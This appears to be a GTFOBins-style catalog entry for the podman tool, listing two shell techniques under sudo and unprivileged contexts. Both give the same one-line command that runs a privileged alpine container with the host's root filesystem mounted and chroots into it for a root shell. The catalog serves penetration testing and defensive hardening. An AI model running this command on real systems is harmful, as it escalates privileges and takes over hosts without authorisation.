Catalog GTFOBins

GTFO · Tool

podman

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

This requires an actual image to be available (e.g., `alpine`) downloading it if not present.

podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux

This requires an actual image to be available (e.g., `alpine`) downloading it if not present.

podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh
Context
unprivileged
Native
shell
MITRE
T1059